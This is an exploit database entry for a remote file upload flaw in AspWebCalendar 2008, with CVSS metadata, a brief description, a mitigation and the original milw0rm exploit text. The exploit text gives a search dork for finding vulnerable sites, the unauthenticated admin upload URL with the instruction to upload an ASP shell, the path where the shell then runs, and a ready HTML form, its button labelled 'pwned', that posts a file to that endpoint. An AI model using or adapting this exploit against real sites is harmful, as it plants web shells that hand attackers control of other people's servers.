AspWebCalendar 2008 Remote File Upload Vulnerability

vendor:

AspWebCalendar

by:

Alemin_Krali

9.3

CVSS

HIGH

Remote File Upload

264

CWE

Product Name: AspWebCalendar

Affected Version From: AspWebCalendar 2008

Affected Version To: AspWebCalendar 2008

Patch Exists: Yes

Related CWE: N/A

CPE: a:aspwebcalendar:aspwebcalendar:2008

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

AspWebCalendar 2008 Remote File Upload Vulnerability

AspWebCalendar 2008 is vulnerable to a remote file upload vulnerability. An attacker can upload a malicious ASP file to the web server and execute it.

Mitigation:

Upgrade to the latest version of AspWebCalendar.

Source

Exploit-DB raw data:

Title:AspWebCalendar 2008 Remote File Upload Vulnerability

# Discovered by : Alemin_Krali  

# Dork :calendar.asp?eventdetail

http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp shell

http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address

upload form

<FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT <FONT COLOR='blue' >http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P>


Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed

# milw0rm.com [2008-06-18]